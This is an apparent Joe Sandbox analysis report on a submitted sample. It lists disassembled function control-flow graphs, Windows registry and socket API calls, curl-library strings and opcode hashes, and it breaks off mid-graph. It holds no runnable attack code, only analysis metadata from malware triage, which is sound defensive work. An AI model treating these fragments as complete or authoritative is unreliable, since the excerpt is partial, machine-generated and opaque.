                                      control_flow_graph 1455 582f17-582f8c call a51af0 call a51ee0 1460 5831c9-5831cd 1455->1460 1461 582f91-582ff4 call 581619 RegOpenKeyExA 1460->1461 1462 5831d3-5831d6 1460->1462 1465 582ffa-58300b 1461->1465 1466 5831c5 1461->1466 1467 58315c-5831ac RegEnumKeyExA 1465->1467 1466->1460 1468 583010-583083 call 581619 RegOpenKeyExA 1467->1468 1469 5831b2-5831c2 RegCloseKey 1467->1469 1472 583089-5830d4 RegQueryValueExA 1468->1472 1473 58314e-583152 1468->1473 1469->1466 1474 58313b-58314b RegCloseKey 1472->1474 1475 5830d6-583137 call a51dc0 call a51e50 call a51ee0 call a51cf0 call a51ee0 call a50250 1472->1475 1473->1467 1474->1473 1475->1474
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: CloseEnumOpen
                                      • String ID: d
                                      • API String ID: 1332880857-2564639436
                                      • Opcode ID: a2556e37a64245d8aca4efd537574d3aea24c47da386f959ec35cfab39f536fc
                                      • Instruction ID: 9428e81646d4efd29ff1f1b0c8e684d7e64d4da139ac08fe5a8756f873ed3c5d
                                      • Opcode Fuzzy Hash: a2556e37a64245d8aca4efd537574d3aea24c47da386f959ec35cfab39f536fc
                                      • Instruction Fuzzy Hash: 767196B49043199FDB10EF69C58579EBBF0BF84308F10899DE898A7351D7749A88CF92
                                      Function 005876A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1488 5876a0-5876be 1489 5876c0-5876c7 1488->1489 1490 5876e6-5876f2 send 1488->1490 1489->1490 1491 5876c9-5876d1 1489->1491 1492 58775e-587762 1490->1492 1493 5876f4-587709 call 5872a0 1490->1493 1494 58770b-587759 call 5872a0 call 58cb20 call 908c50 1491->1494 1495 5876d3-5876e4 1491->1495 1493->1492 1494->1492 1495->1493
                                      APIs
                                      • send.WS2_32(multi.c,?,?,?,N=X,00000000,?,?,005907BF), ref: 005876EB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: send
                                      • String ID: LIMIT %s:%d %s reached memlimit$N=X$SEND %s:%d send(%lu) = %ld$multi.c$send
                                      • API String ID: 2809346765-4212605055
                                      • Opcode ID: 36cdb6e9ecb0e9dc2a04e110c4761f92c5f6f69b6830d493cd70071a7343e2a7
                                      • Instruction ID: 12ada1f55cc58add65617cdcf38ee4962b707e879e618f7cc72257724553aa2e
                                      • Opcode Fuzzy Hash: 36cdb6e9ecb0e9dc2a04e110c4761f92c5f6f69b6830d493cd70071a7343e2a7
                                      • Instruction Fuzzy Hash: CE11C8B5A093096BD110AB15EC4AE2B7F9CEBC6B68F540959FC0572252E665DC00C7B1
                                      Function 005B9290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1607 5b9290-5b92ed call 5876a0 1610 5b93c3-5b93ce 1607->1610 1611 5b92f3-5b92fb 1607->1611 1620 5b93d0-5b93e1 1610->1620 1621 5b93e5-5b9427 call 59d090 call 5c4f40 1610->1621 1612 5b93aa-5b93af 1611->1612 1613 5b9301-5b9333 call 59d8c0 call 59d9a0 1611->1613 1614 5b9456-5b9470 1612->1614 1615 5b93b5-5b93bc 1612->1615 1632 5b93a7 1613->1632 1633 5b9335-5b9364 WSAIoctl 1613->1633 1618 5b9429-5b9431 1615->1618 1619 5b93be 1615->1619 1623 5b9439-5b943f 1618->1623 1624 5b9433-5b9437 1618->1624 1619->1614 1620->1615 1625 5b93e3 1620->1625 1621->1614 1621->1618 1623->1614 1628 5b9441-5b9453 call 5c50a0 1623->1628 1624->1614 1624->1623 1625->1614 1628->1614 1632->1612 1636 5b939b-5b93a4 1633->1636 1637 5b9366-5b936f 1633->1637 1636->1632 1637->1636 1639 5b9371-5b9390 setsockopt 1637->1639 1639->1636 1640 5b9392-5b9395 1639->1640 1640->1636
                                      APIs
                                      • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 005B935D
                                      • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 005B9388
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: Ioctlsetsockopt
                                      • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                      • API String ID: 1903391676-2691795271
                                      • Opcode ID: 11ba16d1454d6866825277f88367f0dd953c0de9f943dc7f0b0a8cb0a568c869
                                      • Instruction ID: c8ed6164d97498c08c6ce28f32f47cbe63bf3d778302d703d068fba3ea7afb10
                                      • Opcode Fuzzy Hash: 11ba16d1454d6866825277f88367f0dd953c0de9f943dc7f0b0a8cb0a568c869
                                      • Instruction Fuzzy Hash: 7A51D070604305AFDB11DF24C885FAABBA5FF88314F148528FE589B292E770F991CB91
                                      Function 00587770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1641 587770-58778e 1642 587790-587797 1641->1642 1643 5877b6-5877c2 recv 1641->1643 1642->1643 1646 587799-5877a1 1642->1646 1644 58782e-587832 1643->1644 1645 5877c4-5877d9 call 5872a0 1643->1645 1645->1644 1647 5877db-587829 call 5872a0 call 58cb20 call 908c50 1646->1647 1648 5877a3-5877b4 1646->1648 1647->1644 1648->1645
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: recv
                                      • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                      • API String ID: 1507349165-640788491
                                      • Opcode ID: ec2b39f1d01e6c95211e9bb954de79b0569316fc87d6522c43dd2b752ef13d14
                                      • Instruction ID: 8218dc239c9c34482109caa8f557acd35b02df2a9add37a8c201e72f169070d8
                                      • Opcode Fuzzy Hash: ec2b39f1d01e6c95211e9bb954de79b0569316fc87d6522c43dd2b752ef13d14
                                      • Instruction Fuzzy Hash: 63110BB56053086BE110AA10EC4AF3B7F9CEBCAB64F540568BC0472252D661DC00C7B1
                                      Function 005875E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1660 5875e0-5875ed 1661 5875ef-5875f6 1660->1661 1662 587607-587629 socket 1660->1662 1661->1662 1663 5875f8-5875ff 1661->1663 1664 58762b-58763c call 5872a0 1662->1664 1665 58763f-587642 1662->1665 1666 587601-587602 1663->1666 1667 587643-587699 call 5872a0 call 58cb20 call 908c50 1663->1667 1664->1665 1666->1662
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: socket
                                      • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                      • API String ID: 98920635-842387772
                                      • Opcode ID: d301a8f9cd78d138b2d71510e6638aa322811857ca827afd3fd3d48162b618cb
                                      • Instruction ID: ac8abe26a51187422cbf5a01a01d3fad75403a599f71e45645d299ec01c13376
                                      • Opcode Fuzzy Hash: d301a8f9cd78d138b2d71510e6638aa322811857ca827afd3fd3d48162b618cb
                                      • Instruction Fuzzy Hash: 3011297260561227D6116A69EC07F5B3FD8FBC6734F540964F814B62E2D721C851C3E1
                                      Function 00908E90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1769 908e90-908eb8 _open 1770 908eba-908ec7 1769->1770 1771 908eff-908f2c call 909f70 1769->1771 1773 908ef3-908efa call 908d20 1770->1773 1774 908ec9 1770->1774 1779 908f39-908f51 call 908ca8 1771->1779 1773->1771 1777 908ee2-908ef1 1774->1777 1778 908ecb-908ecd 1774->1778 1777->1773 1777->1774 1780 908ed3-908ed6 1778->1780 1781 a599b0-a599c7 1778->1781 1788 908f30-908f37 1779->1788 1789 908f53-908f5e call 908cc0 1779->1789 1780->1777 1782 908ed8 1780->1782 1784 a599c9 1781->1784 1785 a599ca-a599f1 1781->1785 1782->1777 1787 a599f9-a599ff 1785->1787 1790 a59a01-a59a0f 1787->1790 1791 a59a19-a59a3b 1787->1791 1788->1779 1788->1789 1789->1770 1793 a59a15-a59a18 1790->1793 1796 a59a46-a59a5b 1791->1796 1797 a59a3d-a59a44 1791->1797 1796->1790 1797->1796 1798 a59a5d-a59a72 1797->1798 1798->1793
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: _open
                                      • String ID: terminated$@
                                      • API String ID: 4183159743-3016906910
                                      • Opcode ID: b20d9a80916659d3509ab60544edef00fe2388337dba2685de5757261b0199f1
                                      • Instruction ID: 995a92ee8e807eba5f32537791bf045f863bf6b62dc8b4d4c65ea4915c29cfaf
                                      • Opcode Fuzzy Hash: b20d9a80916659d3509ab60544edef00fe2388337dba2685de5757261b0199f1
                                      • Instruction Fuzzy Hash: 884127B0A08205DEDB10EF79C4447AFBAE4AB85358F108A2DE998D7391EB74D8058B56
                                      Function 005BA150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1801 5ba150-5ba159 1802 5ba15f-5ba17b 1801->1802 1803 5ba250 1801->1803 1804 5ba249-5ba24f 1802->1804 1805 5ba181-5ba1ce getsockname 1802->1805 1804->1803 1806 5ba1d0-5ba1f5 call 59d090 1805->1806 1807 5ba1f7-5ba214 call 5bef30 1805->1807 1815 5ba240-5ba246 call 5c4f40 1806->1815 1807->1804 1811 5ba216-5ba23b call 59d090 1807->1811 1811->1815 1815->1804
                                      APIs
                                      • getsockname.WS2_32(?,?,00000080), ref: 005BA1C7
                                      Strings
                                      • getsockname() failed with errno %d: %s, xrefs: 005BA1F0
                                      • ssloc inet_ntop() failed with errno %d: %s, xrefs: 005BA23B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: getsockname
                                      • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                      • API String ID: 3358416759-2605427207
                                      • Opcode ID: a26b4a05856a6a87a2cd50589a64e60d7bb4f6ce18c5c80188c015ee61f79edb
                                      • Instruction ID: 43520e11554166bdb71d7df9dbb59d87651682e841e89792d52208d7163c346f
                                      • Opcode Fuzzy Hash: a26b4a05856a6a87a2cd50589a64e60d7bb4f6ce18c5c80188c015ee61f79edb
                                      • Instruction Fuzzy Hash: 5B21F671808680BAE6259B28DC47FE6B7BCEFD1328F040654F99853151FF32698586E2
                                      Function 0059D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1821 59d5e0-59d5ee 1822 59d5f0-59d604 call 59d690 1821->1822 1823 59d652-59d662 WSAStartup 1821->1823 1829 59d61b-59d651 call 5a7620 1822->1829 1830 59d606-59d614 1822->1830 1824 59d670-59d676 1823->1824 1825 59d664-59d66f 1823->1825 1824->1822 1827 59d67c-59d68d 1824->1827 1830->1829 1835 59d616 1830->1835 1835->1829
                                      APIs
                                      • WSAStartup.WS2_32(00000202), ref: 0059D65B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: Startup
                                      • String ID: if_nametoindex$iphlpapi.dll
                                      • API String ID: 724789610-3097795196
                                      • Opcode ID: c871e0a7100b43af080efcea538c1292d008533ede14e4e7b7513e1a55c22645
                                      • Instruction ID: 69be5502a407fb7507fcfa341477dac70f5cb5fc84ab9864aadb7b4779fa89e2
                                      • Opcode Fuzzy Hash: c871e0a7100b43af080efcea538c1292d008533ede14e4e7b7513e1a55c22645
                                      • Instruction Fuzzy Hash: D501DBE0D4034246FF116738DD1B76A2DF07B91704F491969DC8C961D2FB69C558C2A3
                                      Function 0064AA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1837 64aa30-64aa64 1839 64ab04-64ab09 1837->1839 1840 64aa6a-64aaa7 call 63e730 1837->1840 1841 64ae80-64ae89 1839->1841 1844 64ab0e-64ab13 1840->1844 1845 64aaa9-64aabd 1840->1845 1846 64ae2e 1844->1846 1847 64aabf-64aac7 1845->1847 1848 64ab18-64ab50 1845->1848 1849 64ae30-64ae4a call 63ea60 call 63ebf0 1846->1849 1847->1846 1850 64aacd-64ab02 1847->1850 1854 64ab58-64ab6d 1848->1854 1862 64ae75-64ae7d 1849->1862 1863 64ae4c-64ae57 1849->1863 1850->1854 1856 64ab96-64abab socket 1854->1856 1857 64ab6f-64ab73 1854->1857 1856->1846 1861 64abb1-64abc5 1856->1861 1857->1856 1859 64ab75-64ab8f 1857->1859 1859->1861 1877 64ab91 1859->1877 1864 64abc7-64abca 1861->1864 1865 64abd0-64abed ioctlsocket 1861->1865 1862->1841 1870 64ae6e-64ae6f 1863->1870 1871 64ae59-64ae5e 1863->1871 1864->1865 1866 64ad2e-64ad39 1864->1866 1867 64ac10-64ac14 1865->1867 1868 64abef-64ac0a 1865->1868 1875 64ad52-64ad56 1866->1875 1876 64ad3b-64ad4c 1866->1876 1872 64ac16-64ac31 1867->1872 1873 64ac37-64ac41 1867->1873 1868->1867 1880 64ae29 1868->1880 1870->1862 1871->1870 1878 64ae60-64ae6c 1871->1878 1872->1873 1872->1880 1882 64ac43-64ac46 1873->1882 1883 64ac7a-64ac7e 1873->1883 1879 64ad5c-64ad6b 1875->1879 1875->1880 1876->1875 1876->1880 1877->1846 1878->1862 1884 64ad70-64ad78 1879->1884 1880->1846 1887 64ad04-64ad08 1882->1887 1888 64ac4c-64ac51 1882->1888 1890 64ace7-64acfe 1883->1890 1891 64ac80-64ac9b 1883->1891 1893 64ada0-64adb2 connect 1884->1893 1894 64ad7a-64ad7f 1884->1894 1887->1866 1895 64ad0a-64ad28 1887->1895 1888->1887 1896 64ac57-64ac78 1888->1896 1890->1887 1891->1890 1892 64ac9d-64acc1 1891->1892 1897 64acc6-64acd7 1892->1897 1899 64adb3-64adcf 1893->1899 1894->1893 1898 64ad81-64ad99 1894->1898 1895->1866 1895->1880 1896->1897 1897->1880 1905 64acdd-64ace5 1897->1905 1898->1899 1906 64add5-64add8 1899->1906 1907 64ae8a-64ae91 1899->1907 1905->1887 1905->1890 1908 64ade1-64adf1 1906->1908 1909 64adda-64addf 1906->1909 1907->1849 1910 